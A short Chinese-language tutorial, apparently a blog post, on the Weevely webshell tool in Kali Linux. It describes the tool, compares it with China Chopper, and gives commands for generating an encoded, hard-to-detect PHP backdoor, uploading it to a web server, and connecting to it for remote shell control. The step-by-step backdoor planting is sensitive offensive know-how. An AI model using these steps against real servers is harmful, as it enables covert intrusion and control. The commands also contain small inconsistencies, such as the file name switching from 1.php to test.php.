一、Weevely是什么

它是Kali Linux中集成的一个webshell工具，是集webshell生成和连接于一身的轻量级后门工具，隐蔽性不错，是随机生成的参数并且加密的。
生成和管理很难检测到的PHP木马，Weevely是一个隐形的PHP网页的外壳，模拟的远程连接。是Web应用程序开发的重要工具，可用于像一个隐藏的后门，作为一个远程控制台更换管理网络帐户。只是生成并上传“服务器”目标Web服务器上的PHP代码，Weevely客户端在本地运行shell命令传输。

二、Weevely有何局限性

它只支持php，而且只命令终端执行，对新手上路值日不友好哦！（不过大家也可以努力去学习，有志者事竟成嘛）

三、Weevely与中国菜刀的区别

weevely的功能同之前学习过的中国菜刀，但其功能更加丰富且在linux和windows下都可以运行。而中国菜刀一般在Windows环境中使用！（不懂可以找度娘啦！）

四、特别说明

kali linux环境下已集成weevely，本文分享均在KaliLinux中完成。

五、如何使用Weevely?

1、在Kali Linux终端输入weevely

2、生成一个php后门，是base64加密的，存放路径可自行指定
格式

      weevelygenerate 密码路径 文件名

举例：

      weevelygenerate passwd /tmp/1.php

解析：生成一个名为test.php的后门，密码为passwd

3、将此后门上传到网站，用weevely连接，连接后面直接跟上设置的密码【网站路径自行指定】

      weevely http://192.168.179.137/doyo/test.php passwd

4、连接webshell，会反弹一个shell终端，中文会乱码，可设置终端界面编码解决之。

5、进行控制操作，如查看系统信息，文件操作，进程操作等

6、同时weevely还支持多个模块使用，在连接上后门之后按Tab键，可以查看可利用的模块，工具很强大，大家自行研究！